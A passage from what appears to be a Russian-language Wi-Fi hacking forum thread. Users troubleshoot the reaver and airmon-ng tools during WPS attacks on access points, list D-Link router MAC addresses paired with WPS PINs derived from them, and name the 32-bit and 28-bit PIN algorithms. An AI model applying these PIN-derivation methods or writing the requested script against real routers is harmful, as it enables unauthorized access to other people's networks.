Обычно ривер выдаёт одну строчку "Failed to associate to ...", а тут целая толпа этих строчек начинает бежать сверху вниз заполняя весь экран, но не это главное. Останавливаю, запускаю айродамп-нг Mon0, а в ответ сообщение, что такого адаптера не существует, нет такого девайса. И только после того, как снова наберёшь airmon-ng start wlan0 всё снова начинает работать.

Такое ощущение что не я атакую точку, а уже точка атакует меня, разрушая среду ривера

binarymaster
22.09.2016, 11:06
Cтолкнулся недавно с новым поведением точек при невозможности ассоциироваться с ними.

Обычно ривер выдаёт одну строчку "Failed to associate to ...", а тут целая толпа этих строчек начинает бежать сверху вниз заполняя весь экран, но не это главное. Останавливаю, запускаю айродамп-нг Mon0, а в ответ сообщение, что такого адаптера не существует, нет такого девайса. И только после того, как снова наберёшь airmon-ng start wlan0 всё снова начинает работать.

Такое ощущение что не я атакую точку, а уже точка атакует меня



Такое бывает, если кабель USB отходит. Ещё иногда такое же случается при запуске системы в ВМ (случалось в VirtualBox и VMware), но там явно другая причина.

killer258
22.09.2016, 11:21
в данном случае это происходит только на двух одних и тех же точках, с другими всё норм. А недавно ещё одна стала "посылать" меня таким же способом. Кабель USB не шевелил. при этом. с другими точками такого нет

mazik
24.09.2016, 11:13
WPS PIN DIR-825AC

MAC==1C:5F:2B:E4:64:11 ---Последние 8знак - 2BE46411=pin 6388113х

MAC==90:8D:78:C7:1F:B5 ---Последние 8знак - 78C71FB5=pin 6315701x

MAC==48:EE:0C:17:CB6 ---Последние 7знак - C17CBD6 =pin 2886102x

ПРОВЕРЯЕМ http://zalil.su/5165265 (КАРТИНКИ РОУТЕРОВ)

3WiFi WPS PIN-0% !?

помощь:

1.https://forum.antichat.ru/threads/310835/page-112#post-3802863

2.База пин кодов

КТО УМЕЕТ НАПИШИТЕ СКРИПТ (PITON, WINDOWS)

henri2002
24.09.2016, 11:20
WPS PIN DIR-825AC

MAC==1C:5F:2B:E4:64:11 ---Последние 8знак - 2BE46411=pin 6388113х

MAC==90:8D:78:C7:1F:B5 ---Последние 8знак - 78C71FB5=pin 6315701x

MAC==48:EE:0C:17:CB6 ---Последние 7знак - C17CBD6 =pin 2886102x



алгоритмы известные

1 и 2 называется 32-bit PIN

3 28-bit PIN